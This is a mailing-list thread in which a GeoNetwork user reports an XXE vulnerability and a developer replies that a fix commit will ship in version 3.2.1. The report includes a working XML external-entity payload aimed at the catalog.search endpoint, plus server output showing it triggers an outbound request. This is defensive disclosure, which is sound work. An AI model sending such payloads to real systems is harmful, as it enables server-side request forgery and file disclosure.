Geonetwork XEE Vulnerability question


Geonetwork XEE Vulnerability question

Mariano Valderrey
Hi,

My name is Mariano Valderrey, and I have scanned my GeoNetwork with
Acunetix and found an XML External Entity Injection vulnerability.  I
found that in GeoServer you have fixed the problem and maybe I can use
the solution for GeoNetwork 3.2.
I wonder if you can help me with this.

Here is what I found:

https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing

**************

To confirm this I sent a specific request with this XML to the URL
/geonetwork/srv/eng/catalog.search

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE request [
   <!ENTITY include SYSTEM "http://google.com">
]>
<catalog.search>&include;</catalog.search>

And I received this result:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>Error 400 Cannot build ServiceRequest
Cause : Error on line 1 of document
http://www.google.com.ar/?gfe_rd=cr&amp;ei=_x9cWI-FMsWB8QfG05vIDA: The
content of elements must consist of well-formed character data or markup.
Error : org.jdom.input.JDOMParseException
</title>
</head>
<body><h2>HTTP ERROR 400</h2>
<p>Problem accessing /geonetwork/srv/eng/catalog.search. Reason:
<pre>    Cannot build ServiceRequest
Cause : Error on line 1 of document
http://www.google.com.ar/?gfe_rd=cr&amp;ei=_x9cWI-FMsWB8QfG05vIDA: The
content of elements must consist of well-formed character data or markup.
Error : org.jdom.input.JDOMParseException
</pre></p><hr><a href="http://eclipse.org/jetty">Powered by Jetty://
9.3.11.v20160721</a><hr/>

</body>
</html>

******************

In the packet capture from the server I can see that it sends a request to
http://google.com, and I found in the result that the server was
redirected to www.google.com.ar. This confirms the vulnerability.

Sorry for my English,

Greetings and thank you so much.


--
Ing. en Sistemas Mariano Valderrey
Tel. (+54 11) 4331 0074 int. 5727
Unidad Base de Datos y Comunicaciones
Gerencia de Gestión Tecnológica
CONAE

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, SlashDot.org! http://sdm.link/slashdot
_______________________________________________
GeoNetwork-usuarios-es mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/geonetwork-usuarios-es

Re: Geonetwork XEE Vulnerability question

Jose Garcia
Hi Mariano,

This issue is fixed in the 3.2.x branch:
https://github.com/geonetwork/core-geonetwork/commit/8bb55373d0c79fd17bfa40e725cf255c9a019145
and it will be included in version 3.2.1.

Regards,
Jose García

On Wed, Dec 28, 2016 at 6:30 PM, Mariano Valderrey <[hidden email]>
wrote:

> Hi,
>
> My name is Mariano Valderrey, and I have scanned my GeoNetwork with
> Acunetix and found an XML External Entity Injection vulnerability.  I
> found that in GeoServer you have fixed the problem and maybe I can use
> the solution for GeoNetwork 3.2.
> I wonder if you can help me with this.
>
> Here is what I found:
>
> https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing
>
> **************
>
> To confirm this I sent a specific request with this XML to the URL
> /geonetwork/srv/eng/catalog.search
>
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE request [
>    <!ENTITY include SYSTEM "http://google.com">
> ]>
> <catalog.search>&include;</catalog.search>
>
> And I received this result:
>
> <html>
> <head>
> <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
> <title>Error 400 Cannot build ServiceRequest
> Cause : Error on line 1 of document
> http://www.google.com.ar/?gfe_rd=cr&amp;ei=_x9cWI-FMsWB8QfG05vIDA: The
> content of elements must consist of well-formed character data or markup.
> Error : org.jdom.input.JDOMParseException
> </title>
> </head>
> <body><h2>HTTP ERROR 400</h2>
> <p>Problem accessing /geonetwork/srv/eng/catalog.search. Reason:
> <pre>    Cannot build ServiceRequest
> Cause : Error on line 1 of document
> http://www.google.com.ar/?gfe_rd=cr&amp;ei=_x9cWI-FMsWB8QfG05vIDA: The
> content of elements must consist of well-formed character data or markup.
> Error : org.jdom.input.JDOMParseException
> </pre></p><hr><a href="http://eclipse.org/jetty">Powered by Jetty://
> 9.3.11.v20160721</a><hr/>
>
> </body>
> </html>
>
> ******************
>
> In the packet capture from the server I can see that it sends a request to
> http://google.com, and I found in the result that the server was
> redirected to www.google.com.ar. This confirms the vulnerability.
>
> Sorry for my English,
>
> Greetings and thank you so much.
>
>
> --
> Ing. en Sistemas Mariano Valderrey
> Tel. (+54 11) 4331 0074 int. 5727
> Unidad Base de Datos y Comunicaciones
> Gerencia de Gestión Tecnológica
> CONAE
>



--
Kind regards,
Jose García
<http://www.geocat.net/>
Veenderweg 13
6721 WD Bennekom
The Netherlands
T: +31 (0)318 416664